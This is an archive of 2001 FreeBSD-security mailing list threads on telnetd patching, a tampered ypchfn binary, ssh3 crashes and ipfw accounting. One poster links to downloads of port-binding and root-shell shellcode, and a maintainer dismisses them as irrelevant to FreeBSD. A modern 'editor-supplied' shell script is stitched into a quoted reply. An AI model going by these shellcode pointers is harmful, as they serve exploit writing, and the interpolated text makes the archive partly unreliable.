Subject: Re: some new exploit is out

> On Fri, Jul 27, 2001 at 05:46:41AM +0800, jianzhong ren wrote:
>
> > I know that the patch for telnet is out too, but is there any new patch
> > for the shared signals vulnerability
>
> Yes, a while ago. You do read advisories, right?
>
> > and portbinding shellcode?
>
> What's this one?
http://www.hack.co.za/download.php?sid=1444 that's for portbinding shellcode (86 bytes)
>
> Kris
>

--
Get your free email from www.linuxmail.org
Powered by Outblaze

From owner-freebsd-security Thu Jul 26 15: 0:38 2001
Date: Fri, 27 Jul 2001 06:00:33 +0800
From: "jianzhong ren"
To: kris@obsecurity.org
Cc: FreeBSD Security
Subject: Re: some new exploit is out
Message-ID: <20010726220033.19129.qmail@linuxmail.org>

-----Original Message-----
From: Kris Kennaway <kris@obsecurity.org>
Date: Thu, 26 Jul 2001 14:52:58 -0700
To: jianzhong ren <jian@linuxmail.org>
Subject: Re: some new exploit is out

> On Fri, Jul 27, 2001 at 05:46:41AM +0800, jianzhong ren wrote:
>
> > i know that patch for telnet is out too, but is there any new patch
> > for shared signals vulnerability
>
> Yes, a while ago. You do read advisories, right?
>
> > and portbinding shellcode?
>
> What's this one?
>
> Kris

and this http://www.hack.co.za/download.php?sid=1445 for setreuid(0,0) execve /bin/sh shellcode (29 bytes)
>

From owner-freebsd-security Thu Jul 26 15: 1:10 2001
Date: Thu, 26 Jul 2001 15:01:04 -0700
From: Kris Kennaway
To: "Dan Mahoney, System Admin"
Cc: Kris Kennaway, security@freebsd.org, security-officer@freebsd.org
Subject: Re: Mistake in security advisory.
Message-ID: <20010726150104.A79340@xor.obsecurity.org>
References: <20010726130347.A49735@xor.obsecurity.org>
In-Reply-To: ; from danm@prime.gushi.org on Thu, Jul 26, 2001 at 05:10:28PM -0400

On Thu, Jul 26, 2001 at 05:10:28PM -0400, Dan Mahoney, System Admin wrote:
> On Thu, 26 Jul 2001, Kris Kennaway wrote:
>
> > On Thu, Jul 26, 2001 at 09:19:20AM -0400, Dan Mahoney, System Admin wrote:
> >
> > > # cd /usr/src/
> > > # patch -p < /path/to/patch
> > > # cd /usr/src/secure/libexec/telnetd
> > > # make depend && make all install
> > >
> > > /* This directory does NOT exist, only /usr/src/libexec/telnetd exists in
> > > 3.5.1-Stable */
> >
> > Sounds like you're not cvsupping the src-secure collection, then.
>
> From the supfile:
>
> # These are the individual collections that make up FreeBSD's crypto
> # collection. They are no longer export-restricted and are a part of
> # src-all
> #src-crypto
> #src-secure
> #src-sys-crypto

Um, these are all commented out.

Kris

From owner-freebsd-security Thu Jul 26 15: 5:35 2001
Date: Thu, 26 Jul 2001 15:05:29 -0700
From: Kris Kennaway
To: jianzhong ren
Cc: kris@obsecurity.org, FreeBSD Security
Subject: Re: some new exploit is out
Message-ID: <20010726150529.A82158@xor.obsecurity.org>
References: <20010726220033.19129.qmail@linuxmail.org>
In-Reply-To: <20010726220033.19129.qmail@linuxmail.org>; from jian@linuxmail.org on Fri, Jul 27, 2001 at 06:00:33AM +0800
On Fri, Jul 27, 2001 at 06:00:33AM +0800, jianzhong ren wrote:
>
> -----Original Message-----
> From: Kris Kennaway <kris@obsecurity.org>
> Date: Thu, 26 Jul 2001 14:52:58 -0700
> To: jianzhong ren <jian@linuxmail.org>
> Subject: Re: some new exploit is out
>
>
> > On Fri, Jul 27, 2001 at 05:46:41AM +0800, jianzhong ren wrote:
> >
> > > i know that patch for telnet is out too, but is there any new patch
> > > for shared signals vulnerability
> >
> > Yes, a while ago. You do read advisories, right?
> >
> > > and portbinding shellcode?
> >
> > What's this one?
> >
> > Kris
>
> and this http://www.hack.co.za/download.php?sid=1445 for setreuid(0,0) execve /bin/sh shellcode (29 bytes)
> >

Oh, I see... you're talking about examples of shellcode, not FreeBSD
vulnerabilities. That has little to no relevance to anyone on this
list unless you're a script kiddie.
Kris

From owner-freebsd-security Thu Jul 26 15:34:14 2001
Date: Fri, 27 Jul 2001 06:33:56 +0800
From: "jianzhong ren"
To: kris@obsecurity.org
Cc: FreeBSD Security
Subject: Re: some new exploit is out
Message-ID: <20010726223356.21906.qmail@linuxmail.org>

> On Fri, Jul 27, 2001 at 06:00:33AM +0800, jianzhong ren wrote:
> >
> > -----Original Message-----
> > From: Kris Kennaway <kris@obsecurity.org>
> > Date: Thu, 26 Jul 2001 14:52:58 -0700
> > To: jianzhong ren <jian@linuxmail.org>
> > Subject: Re: some new exploit is out
> >
> >
> > > On Fri, Jul 27, 2001 at 05:46:41AM +0800,
> > > jianzhong ren wrote:
> > > >
> > > > > i know that patch for telnet is out too, but is there any new patch
> > > > > for shared signals vulnerability
> > > >
> > > > Yes, a while ago. You do read advisories, right?
> > > >
> > > > > and portbinding shellcode?
> > > >
> > > > What's this one?
> > > >
> > > > Kris
> >
> > and this http://www.hack.co.za/download.php?sid=1445 for setreuid(0,0) execve /bin/sh shellcode (29 bytes)
> > >
>
> Oh, I see... you're talking about examples of shellcode, not FreeBSD
> vulnerabilities. That has little to no relevance to anyone on this
> list unless you're a script kiddie.
>

i'm not a script kiddie, but maybe some of my users are.
the company where i work offers a shell server on freebsd, and i want to prepare my shell server for any kind of exploit.

thank you

From owner-freebsd-security Thu Jul 26 15:55:18 2001
Date: Thu, 26 Jul 2001 18:51:49 -0400 (EDT)
From: "Dan Mahoney, System Admin"
To: Kris Kennaway
Cc: security@freebsd.org, security-officer@freebsd.org
Subject: Re: Mistake in security advisory.
In-Reply-To: <20010726150104.A79340@xor.obsecurity.org>

On Thu, 26 Jul 2001, Kris Kennaway wrote:
> On Thu, Jul 26, 2001 at 05:10:28PM -0400, Dan Mahoney, System Admin wrote:
> > On Thu, 26 Jul 2001, Kris Kennaway wrote:
> >
> > > On Thu, Jul 26, 2001 at 09:19:20AM -0400, Dan Mahoney, System Admin wrote:
> > >
> > > > # cd /usr/src/
> > > > # patch -p < /path/to/patch
> > > > # cd /usr/src/secure/libexec/telnetd
> > > > # make depend && make all install
> > > >
> > > > /* This directory does NOT exist, only /usr/src/libexec/telnetd exists in
> > > > 3.5.1-Stable */
> > >
> > > Sounds like you're not cvsupping the src-secure collection, then.
> >
> > From the supfile:
> >
> > # These are the individual collections that make up FreeBSD's crypto
> > # collection. They are no longer export-restricted and are a part of
> > # src-all
> > #src-crypto
> > #src-secure
> > #src-sys-crypto
>
> Um, these are all commented out.

Yes they are, because as the comments say, they are included if you grab
src-all (which I do, and is the default). Enclosing the full supfile.

# $FreeBSD: src/share/examples/cvsup/stable-supfile,v 1.12.2.7 2000/07/09 16:25:03 markm Exp $
#
# This file contains all of the "CVSup collections" that make up the
# FreeBSD-stable source tree.
#
# CVSup (CVS Update Protocol) allows you to download the latest CVS
# tree (or any branch of development therefrom) to your system easily
# and efficiently (far more so than with sup, which CVSup is aimed
# at replacing).
# If you're running CVSup interactively, and are
# currently using an X display server, you should run CVSup as follows
# to keep your CVS tree up-to-date:
#
#     cvsup stable-supfile
#
# If not running X, or invoking cvsup from a non-interactive script, then
# run it as follows:
#
#     cvsup -g -L 2 stable-supfile
#
# You may wish to change some of the settings in this file to better
# suit your system:
#
# host=CHANGE_THIS.FreeBSD.org
#               This specifies the server host which will supply the
#               file updates. You must change it to one of the CVSup
#               mirror sites listed in the FreeBSD Handbook at
#               http://www.freebsd.org/handbook/mirrors.html.
#               You can override this setting on the command line
#               with cvsup's "-h host" option.
#
# base=/usr
#               This specifies the root where CVSup will store information
#               about the collections you have transferred to your system.
#               A setting of "/usr" will generate this information in
#               /usr/sup. Even if you are CVSupping a large number of
#               collections, you will be hard pressed to generate more than
#               ~1MB of data in this directory. You can override the
#               "base" setting on the command line with cvsup's "-b base"
#               option. This directory must exist in order to run CVSup.
#
# prefix=/usr
#               This specifies where to place the requested files. A
#               setting of "/usr" will place all of the files requested
#               in "/usr/src" (e.g., "/usr/src/bin", "/usr/src/lib").
#               The prefix directory must exist in order to run CVSup.
#
###############################################################################
#
# DANGER! WARNING! LOOK OUT! VORSICHT!
#
# If you add any of the ports collections to this file, be sure to
# specify them like this:
#
#     ports-all tag=.
#
# If you leave out the "tag=." portion, CVSup will delete all of
# the files in your ports tree. That is because the ports collections
# do not use the same tags as the main part of the FreeBSD source tree.
#
###############################################################################

# Defaults that apply to all the collections
#
# IMPORTANT: Change the next line to use one of the CVSup mirror sites
# listed at http://www.freebsd.org/handbook/mirrors.html.
*default host=CHANGE_THIS.FreeBSD.org
*default base=/usr
*default prefix=/usr
# The following line is for 3-stable. If you want 2.2-stable, change
# "RELENG_3" to "RELENG_2_2".
*default release=cvs tag=RELENG_3
*default delete use-rel-suffix

# If your network link is a T1 or faster, comment out the following line.
*default compress

## Main Source Tree.
#
# The easiest way to get the main source tree is to use the "src-all"
# mega-collection. It includes all of the individual "src-*" collections,
# except the export-restricted collections.
src-all

# These are the individual collections that make up "src-all". If you
# use these, be sure to comment out "src-all" above.
#src-base
#src-bin
#src-contrib
#src-etc
#src-games
#src-gnu
#src-include
#src-kerberos5
#src-kerberosIV
#src-lib
#src-libexec
#src-release
#src-sbin
#src-share
#src-sys
#src-tools
#src-usrbin
#src-usrsbin

# These are the individual collections that make up FreeBSD's crypto
# collection. They are no longer export-restricted and are a part of
# src-all
#src-crypto
#src-secure
#src-sys-crypto

--
"Goodbye my peoples. I'll miss each one of you. Sniff-Sniff I now know the true meaning of love. Thank you Sniff-Sniff. You are all in my heart."
-Chris D.
--------Dan Mahoney--------
Techie, Sysadmin, WebGeek
Gushi on efnet/undernet IRC
ICQ: 13735144 AIM: LarpGM
Web: http://prime.gushi.org
finger danm@prime.gushi.org for pgp public key and tel#
---------------------------

From owner-freebsd-security Thu Jul 26 16:15:56 2001
Message-Id: <200107262320.SAA12979@chrome.jdl.com>
To: security@freebsd.org
Subject: Some Followup on that ypchfn mess of mine
Clarity-Index: null
Threat-Level: none
Software-Engineering-Dead-Seriousness: There's no excuse for unreadable code.
Net-thought: If you meet the Buddha on the net, put him in your Kill file.
Date: Thu, 26 Jul 2001 18:20:51 -0500
From: Jon Loeliger

Hi folks,

So, I've turned off telnetd. I've extracted all the
critical data and backups from this machine and can recover
things as needed.

I'm now trying to cripple the modified ypchfn program,
but I don't seem to be able to modify it in any way.
I can't chmod, rm, unlink, chown, or overwrite it.
All it says is "operation not permitted".

How dumb am I here?
Thanks,
jdl

From owner-freebsd-security Thu Jul 26 16:21:25 2001
Date: Thu, 26 Jul 2001 19:21:23 -0400
From: Anthony Schneider
To: Jon Loeliger
Cc: security@FreeBSD.ORG
Subject: Re: Some Followup on that ypchfn mess of mine
Message-ID: <20010726192123.A37564@mail.slc.edu>
References: <200107262320.SAA12979@chrome.jdl.com>
In-Reply-To: <200107262320.SAA12979@chrome.jdl.com>; from jdl@jdl.com on Thu, Jul 26, 2001 at 06:20:51PM -0500

Type ls -lo /path/to/ypchfn, and look for flags set on it
(i.e. schg, uchg). If any of these are set, you will
need to run
        chflags noschg ypchfn
(or switch noschg with whatever flag is set).
Not sure what else it might be.
-Anthony.

On Thu, Jul 26, 2001 at 06:20:51PM -0500, Jon Loeliger wrote:
> Hi folks,
>
> So, I've turned off telnetd. I've extracted all the
> critical data and backups from this machine and can recover
> things as needed.
>
> I'm now trying to cripple the modified ypchfn program,
> but I don't seem to be able to modify it in any way.
> I can't chmod, rm, unlink, chown, or overwrite it.
> All it says is "operation not permitted".
>
> How dumb am I here?
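Anthony's check, turned into a small triage helper. This is an added example (editor-supplied, not code from anyone in the thread). It encodes the rule that decides whether chflags can help at all: the user flags (uchg, uappnd, uunlnk) can be cleared by the owner or root at any securelevel, but the system flags schg and sappnd are refused by the kernel while kern.securelevel is 1 or higher, and securelevel cannot be lowered on a running system, so the only way out is to lower kern_securelevel in /etc/rc.conf and reboot. The flag column position in `ls -lo` and the `inspect_binary` wrapper assume a FreeBSD host; `flag_clear_verdict` and `chflags_command` are pure string logic and run on any sh.

```shell
#!/bin/sh
# Added example (editor-supplied, not from the thread): triage a binary that
# root cannot chmod/rm because of file flags, as with the ypchfn above.

# flag_clear_verdict FLAGS SECURELEVEL
#   FLAGS is the flags column of "ls -lo": "-" when none, else e.g. "uchg,schg".
#   Prints one word:
#     clean      no flags set; chmod/rm should already work
#     clearable  chflags(1) can remove the flags right now
#     locked     a system flag (schg/sappnd) is set and securelevel >= 1:
#                chflags fails until kern_securelevel is lowered in
#                /etc/rc.conf and the machine is rebooted
flag_clear_verdict() {
    flags=$1
    level=$2
    if [ "$flags" = "-" ] || [ -z "$flags" ]; then
        echo clean
        return 0
    fi
    locked=0
    # flags are comma-separated; turn them into words for the loop
    for f in $(printf '%s\n' "$flags" | tr ',' ' '); do
        case "$f" in
            schg|sappnd)
                # system flags: the kernel refuses to clear them at securelevel >= 1
                if [ "$level" -ge 1 ]; then locked=1; fi
                ;;
            uchg|uappnd|uunlnk)
                # user flags: owner or root may clear them at any securelevel
                ;;
            *)
                echo "flag_clear_verdict: unknown flag '$f'" >&2
                ;;
        esac
    done
    if [ "$locked" -eq 1 ]; then echo locked; else echo clearable; fi
}

# chflags_command FLAGS PATH
#   Prints the single chflags invocation that clears every listed flag,
#   e.g. "uchg,schg" -> "chflags nouchg,noschg PATH"; prints nothing for "-".
chflags_command() {
    flags=$1
    path=$2
    if [ "$flags" = "-" ] || [ -z "$flags" ]; then
        return 0
    fi
    echo "chflags $(printf '%s\n' "$flags" | sed 's/[^,][^,]*/no&/g') $path"
}

# inspect_binary PATH
#   Live check for a FreeBSD host (assumptions: FreeBSD "ls -lo" prints the
#   flags in column 5 after mode, links, owner, group; sysctl exposes
#   kern.securelevel). Not exercised on other systems.
inspect_binary() {
    path=$1
    flags=$(ls -lo "$path" | awk '{print $5}')
    level=$(sysctl -n kern.securelevel)
    verdict=$(flag_clear_verdict "$flags" "$level")
    echo "$path: flags=$flags securelevel=$level -> $verdict"
    case "$verdict" in
        clearable)
            echo "run: $(chflags_command "$flags" "$path")" ;;
        locked)
            echo "set kern_securelevel=\"0\" (or -1) in /etc/rc.conf, reboot, then run:"
            echo "  $(chflags_command "$flags" "$path")" ;;
    esac
}

# On a FreeBSD host: inspect_binary /path/to/ypchfn
```

The "locked" verdict is the case jdl hit further down in this thread; the script prints the reboot step rather than trying chflags, because at securelevel 1 the call fails with the same "operation not permitted" that rm and chmod give.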
>
> Thanks,
> jdl

From owner-freebsd-security Thu Jul 26 16:48:19 2001
Date: Thu, 26 Jul 2001 16:28:25 -0700 (PDT)
From: nathan barrick
To: Ryan
Subject: Re: ssh3
In-Reply-To: <000401c11627$9f552ea0$45d8db40@mhx800>

ryan,

heh, well that doesn't help my situation. but thanks for the input.

any more ideas? anyone?

thanks,
nathan

On Thu, 26 Jul 2001, Ryan wrote:
> use openssh ;]
>
> ----- Original Message -----
> From: "nathan barrick"
> Sent: Thursday, July 26, 2001 3:34 PM
> Subject: ssh3
>
>
> > i downloaded ssh-3.0.1.tar.gz from ssh.com. i configure/make and
> > everything works fine. no errors. but.. if i try to run the ssh client
> > i get this error.
> >
> > Received signal 11. (no core)
> >
> > any ideas? i can ssh in to the box so i know the daemon still works.
> > but i can't get the client to work. i've checked on the soft links to make
> > sure everything is working properly and that it is all going in the right
> > direction. everything seems to be.
> >
> > if you have any ideas they'd be greatly appreciated.
> >
> > nathan.
> >

From owner-freebsd-security Thu Jul 26 16:58:50 2001
Date: Thu, 26 Jul 2001 16:58:45 -0700
From: Kris Kennaway
To: jianzhong ren
Cc: kris@obsecurity.org, FreeBSD Security
Subject: Re: some new exploit is out
Message-ID: <20010726165845.A86561@xor.obsecurity.org>
References: <20010726223356.21906.qmail@linuxmail.org>
In-Reply-To: <20010726223356.21906.qmail@linuxmail.org>; from jian@linuxmail.org on Fri, Jul 27, 2001 at 06:33:56AM +0800

On Fri, Jul 27, 2001 at 06:33:56AM +0800, jianzhong ren wrote:
> > Oh, I see... you're talking about examples of shellcode, not FreeBSD
> > vulnerabilities. That has little to no relevance to anyone on this
> > list unless you're a script kiddie.
> >
> i'm not a script kiddie, but maybe some of my users are.
> the company where i work offers a shell server on freebsd, and i want to prepare my shell server for any kind of exploit.

"New" examples of shellcode aren't new exploits for FreeBSD, they're
pieces which can be used by someone in writing an exploit for a given
vulnerability.

Kris

From owner-freebsd-security Thu Jul 26 17:20:58 2001
Message-Id: <200107270025.TAA13221@chrome.jdl.com>
To: Anthony Schneider
Cc: security@FreeBSD.ORG
Subject: Re: Some Followup on that ypchfn mess of mine
In-reply-to: Your message of "Thu, 26 Jul 2001 19:21:23 EDT." <20010726192123.A37564@mail.slc.edu>
Clarity-Index: null
Threat-Level: none
Software-Engineering-Dead-Seriousness: There's no excuse for unreadable code.
Net-thought: If you meet the Buddha on the net, put him in your Kill file.
Date: Thu, 26 Jul 2001 19:25:56 -0500
From: Jon Loeliger

So, like Anthony Schneider was saying to me just the other day:

> Type ls -lo /path/to/ypchfn, and look for flags set on it
> (i.e. schg, uchg). If any of these are set, you will
> need to run
>         chflags noschg ypchfn
> (or switch noschg with whatever flag is set).
> Not sure what else it might be.
> -Anthony.
>

So cleverly, I did this and it didn't work. Then I got to thinking...

    # sysctl kern.securelevel
    kern.securelevel: 1

Uh oh. Hack rc.conf, back down to -1...

    # chflags noschg ypchfn

And finally.

    # chmod -x ypchfn

Woo hoo!

OK, so I feel a bit better now... :-)

Thanks!
jdl

From owner-freebsd-security Thu Jul 26 17:46:26 2001
Date: Thu, 26 Jul 2001 17:46:20 -0700
From: Kris Kennaway
To: "Dan Mahoney, System Admin"
Cc: Kris Kennaway, security@freebsd.org, security-officer@freebsd.org
Subject: Re: Mistake in security advisory.
Message-ID: <20010726174619.A3118@xor.obsecurity.org>
References: <20010726150104.A79340@xor.obsecurity.org>
In-Reply-To: ; from danm@prime.gushi.org on Thu, Jul 26, 2001 at 06:51:49PM -0400

On Thu, Jul 26, 2001 at 06:51:49PM -0400, Dan Mahoney, System Admin wrote:
> > Um, these are all commented out.
>
> Yes they are, because as the comments say, they are included if you grab
> src-all (which I do, and is the default).

Okay, it wasn't clear you noticed this. I've just checked and it looks
like you're right: the makefiles for telnet under secure/ were only
added in the 4.x branch to support the SRA encryption features. There
are only two telnet[d] make infrastructures in 3.x; under libexec/ and
kerberosIV/. I'll try and update the advisory tomorrow.
Kris

From owner-freebsd-security Thu Jul 26 19:31:24 2001
Date: Thu, 26 Jul 2001 21:31:20 -0500 (CDT)
From: Mike Silbersack
To: "Nickolay A.Kritsky"
Subject: Re: accounting with ipfw (gid, uid rules)
In-Reply-To: <7167463367.20010726172101@internethelp.ru>
Message-ID: <20010726212826.J40333-100000@achilles.silby.com>

On Thu, 26 Jul 2001, Nickolay A.Kritsky wrote:

> 01010 count ip from any to 212.113.112.145 via rl0
> 01010 count ip from 212.113.112.145 to any via rl0
> 01010 count ip from any to 212.113.112.145 uid nobody via rl0
> 01010 count ip from any to 212.113.112.145 uid root via rl0
> 01010 count ip from any to 212.113.112.145 uid httpd via rl0
> 01010 count ip from any to 212.113.112.145 uid ftp via rl0

The uid associated with a socket is the uid of the process which created it.
So, when apache creates a socket as root, then hands it off to one of the
httpd processes, it's still accounted to root. This should be true for any
socket running on a port < 1024, as they have to be allocated as root.

So, you're going to have to account by port numbers. In httpd's case, that
shouldn't be a problem. In ftp's case, that's another story.

FWIW, I had a patch which made the uid switch during accept on -current,
but I figured that there were some subtle security-related problems with
it and subsequently pigeonholed it.

Mike "Silby" Silbersack

From owner-freebsd-security Thu Jul 26 21:23:33 2001
Date: Thu, 26 Jul 2001 20:55:48 -0700 (PDT)
From: nathan barrick
Subject: Re: ssh3

okay, i've tried to recompile with pretty much every
other option. earlier someone said that i might not be
using the 'core' ssh utilities.. well i've used every
binary possible that's rep ssh on my machine. and i get
the same error on all of them. i'm using freebsd4.2-r on
the machine i'm having issues with if that helps.

again, i've tried pretty much everything. and i'm not
exactly sure why it'd be doing this in the first place.
if you have _any more_ ideas or suggestions, they'd be greatly
appreciated. thanks again.

nathan.

From owner-freebsd-security Thu Jul 26 22:16:31 2001
Date: Thu, 26 Jul 2001 22:16:23 -0700
From: Kris Kennaway
To: nathan barrick
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ssh3
Message-ID: <20010726221623.A6831@xor.obsecurity.org>
In-Reply-To: ; from nathan@salvation.unixgeeks.com on Thu, Jul 26, 2001 at 08:55:48PM -0700

On Thu, Jul 26, 2001 at 08:55:48PM -0700, nathan barrick wrote:
>
> okay, i've tried to recompile with pretty much every
> other option. earlier someone said that i might not be
> using the 'core' ssh utilities.. well i've used every
> binary possible that's rep ssh on my machine. and i get
> the same error on all of them. i'm using freebsd4.2-r on
> the machine i'm having issues with if that helps.
>
> again, i've tried pretty much everything. and i'm not
> exactly sure why it'd be doing this in the first place.
>=20 > if you have _anymore_ ideas or suggestion, they'd be greatly > appreciated. thanks again. You probably should take this up on the ssh.com support mailing list, if any. Most people on this list probably don't use that software. kris --/9DWx/yDrRhgMJTb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE7YPknWry0BWjoQKURAhDNAKD4Ii6t3ujOdqbgco+jneNKkGOFGQCfRGES djhm0oVebQT6zDFXpUicvZo= =f0MP -----END PGP SIGNATURE----- --/9DWx/yDrRhgMJTb-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jul 26 23:16:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.airlinksys.com (mailhub.airlinksys.com [216.70.12.6]) by hub.freebsd.org (Postfix) with ESMTP id D688237B413 for ; Thu, 26 Jul 2001 23:16:47 -0700 (PDT) (envelope-from sjohn@airlinksys.com) Received: from sjohn.airlinksys.com (sjohn.airlinksys.com [216.70.12.7]) by mailhub.airlinksys.com (Postfix) with ESMTP id 548F253510 for ; Fri, 27 Jul 2001 01:16:47 -0500 (CDT) Received: by sjohn.airlinksys.com (Postfix, from userid 1000) id 266BA5DCC; Fri, 27 Jul 2001 01:16:47 -0500 (CDT) Date: Fri, 27 Jul 2001 01:16:47 -0500 From: Scott Johnson To: freebsd-security@freebsd.org Subject: ssh_host_dsa_key fingerprint Message-ID: <20010727011647.A69806@sjohn.airlinksys.com> Reply-To: Scott Johnson Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org If you're like me and wondered how to get a fingerprint for your DSA host key: start ssh-agent, add the host key, and list your keys. 
If you don't care or already figured out a way, disregard this message. :-)

--
Scott Johnson
System/Network Administrator
Airlink Systems

From owner-freebsd-security Fri Jul 27 4:36:50 2001
Date: Fri, 27 Jul 2001 07:32:20 -0400
From: "Matthew Emmerton"
Subject: problem with telnetd patch
Message-ID: <005301c1168f$cc478c60$1200a8c0@gsicomp.on.ca>

[ please cc, not on security- ]

Folks,

I just updated one of my client's machines to RELENG_4_3, and attempted to update telnetd.

I used:

    cd /usr/src/secure/libexec/telnetd
    make depend && make all install

which failed, complaining of unresolved Kerberos symbols.

To fix the problem, I had to add ${LIBKRB} and ${LIBCOM_ERR} to the DPADD line of the Makefile, and -lkrb and -lcom_err to the LDADD line of the Makefile.

The machine that I was upgrading was a clean install of 4.3-REL from a few months ago, no cvsup's of any source since then. Any ideas why I was running into this problem?

--
Matt Emmerton

From owner-freebsd-security Fri Jul 27 7:53:34 2001
Date: Fri, 27 Jul 2001 17:04:48 +0200
From: "Karsten W. Rohrbach"
To: Scott Johnson
Cc: freebsd-security@freebsd.org
Subject: Re: ssh_host_dsa_key fingerprint
Message-ID: <20010727170448.I23159@mail.webmonster.de>
In-Reply-To: <20010727011647.A69806@sjohn.airlinksys.com>

Scott Johnson(sjohn@airlinksys.com)@2001.07.27 01:16:47 +0000:
> If you're like me and wondered how to get a fingerprint for your DSA host
> key: start ssh-agent, add the host key, and list your keys.
>
> If you don't care or already figured out a way, disregard this message.
> :-)

man ssh-keygen(1):

    -l      Show fingerprint of specified private or public key file.

have fun,
/k

--
> If you meet somebody who tells you that he loves you more than anybody
> in the whole wide world, don't trust him. It means he experiments.
KR433/KR11-RIPE -- WebMonster Community Founder -- nGENn GmbH Senior Techie
http://www.webmonster.de/ -- ftp://ftp.webmonster.de/ -- http://www.ngenn.net/
karsten&rohrbach.de -- alpha&ngenn.net -- alpha&scene.org -- catch@spam.de
GnuPG 0x2964BF46 2001-03-15 42F9 9FFF 50D4 2F38 DBEE DF22 3340 4F4E 2964 BF46
Please do not remove my address from To: and Cc: fields in mailing lists.
10x

From owner-freebsd-security Fri Jul 27 8:19:18 2001
Date: Fri, 27 Jul 2001 19:18:53 +0400
From: "Nickolay A.Kritsky"
To: Mike Silbersack
Cc: security@FreeBSD.ORG
Subject: Re[2]: accounting with ipfw (gid, uid rules)
Message-ID: <15993079421.20010727191853@internethelp.ru>
In-Reply-To: <20010726212826.J40333-100000@achilles.silby.com>

Hello Mike,

Friday, July 27, 2001, 6:31:20 AM, you wrote:

MS> On Thu, 26 Jul 2001, Nickolay A.Kritsky wrote:
>> 01010 count ip from any to 212.113.112.145 via rl0
>> 01010 count ip from 212.113.112.145 to any via rl0
>> 01010 count ip from any to 212.113.112.145 uid nobody via rl0
>> 01010 count ip from any to 212.113.112.145 uid root via rl0
>> 01010 count ip from any to 212.113.112.145 uid httpd via rl0
>> 01010 count ip from any to 212.113.112.145 uid ftp via rl0

MS> The uid associated with a socket is the uid of the process which created
MS> it. So, when apache creates a socket as root, then hands it off to one of
MS> the httpd processes, it's still accounted to root. This should be true
MS> for any socket running on a port < 1024, as they have to be allocated as
MS> root.

do you mean that after this code:

    //----------------------------------------------------------------
    setuid(0);                 /* parent runs as root */
    s = socket(...);           /* bind() to the privileged port elided */
    listen(s, 1);
    if (fork() == 0) {         /* child: drop privileges, then accept */
        setuid(1);
        k = accept(s);
    }
    . . .
    //----------------------------------------------------------------

socket pointed by k will be "owned" by root?

Anyway, it is not the main point of my question. Accounting httpd traffic is just a piece of cake - the port is fixed, the address is fixed. But I wanted to count Squid traffic. AFAIK Squid does not do any setuid() voodoo, except for privileges drop at startup. After that it runs strictly uid 'nobody'. But squid's traffic doesn't hit the counter!!! I wonder why. Maybe it is because of natd running on outer interface? But why then some packets hit the counter?

MS> So, you're going to have to account by port numbers. In httpd's case,
MS> that shouldn't be a problem. In ftp's case, that's another story.

in squid's case it is just impossible :\ . All I can think about so far is adding an alias interface, binding squid to this interface and counting with host src and dst fields, but adding another alias network interface every time I add some new daemon and want to account its traffic looks a little funny. IMHO, it looks just awful.

MS> FWIW, I had a patch which made the uid switch during accept on -current,
MS> but I figured that there were some subtle security-related problems with
MS> it and subsequently pigeonholed it.

Sorry, but what does FWIW mean?

MS> Mike "Silby" Silbersack

;-------------------------------------------
; NKritsky
; SysAdmin InternetHelp.Ru
; http://www.internethelp.ru
; mailto:nkritsky@internethelp.ru

From owner-freebsd-security Fri Jul 27 8:25:34 2001
Date: Fri, 27 Jul 2001 18:24:33 +0300
From: Peter Pentchev
To: "Karsten W. Rohrbach"
Cc: Scott Johnson, freebsd-security@freebsd.org
Subject: Re: ssh_host_dsa_key fingerprint
Message-ID: <20010727182433.A1105@ringworld.oblivion.bg>
In-Reply-To: <20010727170448.I23159@mail.webmonster.de>

On Fri, Jul 27, 2001 at 05:04:48PM +0200, Karsten W. Rohrbach wrote:
> Scott Johnson(sjohn@airlinksys.com)@2001.07.27 01:16:47 +0000:
> > If you're like me and wondered how to get a fingerprint for your DSA host
> > key: start ssh-agent, add the host key, and list your keys.
> >
> > If you don't care or already figured out a way, disregard this message.
> > :-)
>
> man ssh-keygen(1):
>
> -l      Show fingerprint of specified private or public key file.

Does this work for DSA though?

    [root@ringworld:v3 ~]# ssh-keygen -lf /etc/ssh/ssh_host_dsa_key
    /etc/ssh/ssh_host_dsa_key is not a valid key file.
    [root@ringworld:v3 ~]# ssh-keygen -lf /etc/ssh/ssh_host_key
    1024 fc:1f:cf:8c:5c:dc:10:d7:80:21:a3:cc:3b:b2:9f:9d root@ringworld.office1.bg
    [root@ringworld:v3 ~]#

Seems to work OK for the RSA host key.. This is on a -stable rebuilt today:

    [root@ringworld:v3 ~]# ssh -V
    SSH Version OpenSSH_2.3.0 green@FreeBSD.org 20010321, protocol versions 1.5/2.0.
    Compiled with SSL (0x0090601f).

G'luck,
Peter

--
When you are not looking at it, this sentence is in Spanish.

From owner-freebsd-security Fri Jul 27 8:57:52 2001
Date: Fri, 27 Jul 2001 18:08:44 +0200
From: "Karsten W. Rohrbach"
To: Scott Johnson, freebsd-security@freebsd.org
Subject: Re: ssh_host_dsa_key fingerprint
Message-ID: <20010727180844.M23159@mail.webmonster.de>
In-Reply-To: <20010727182433.A1105@ringworld.oblivion.bg>

Peter Pentchev(roam@orbitel.bg)@2001.07.27 18:24:33 +0000:
> On Fri, Jul 27, 2001 at 05:04:48PM +0200, Karsten W. Rohrbach wrote:
> > Scott Johnson(sjohn@airlinksys.com)@2001.07.27 01:16:47 +0000:
> > > If you're like me and wondered how to get a fingerprint for your DSA host
> > > key: start ssh-agent, add the host key, and list your keys.
> > >
> > > If you don't care or already figured out a way, disregard this message.
> > > :-)
> >
> > man ssh-keygen(1):
> >
> > -l      Show fingerprint of specified private or public key file.
>
> Does this work for DSA though?
>
> [root@ringworld:v3 ~]# ssh-keygen -lf /etc/ssh/ssh_host_dsa_key
> /etc/ssh/ssh_host_dsa_key is not a valid key file.
> [root@ringworld:v3 ~]# ssh-keygen -lf /etc/ssh/ssh_host_key
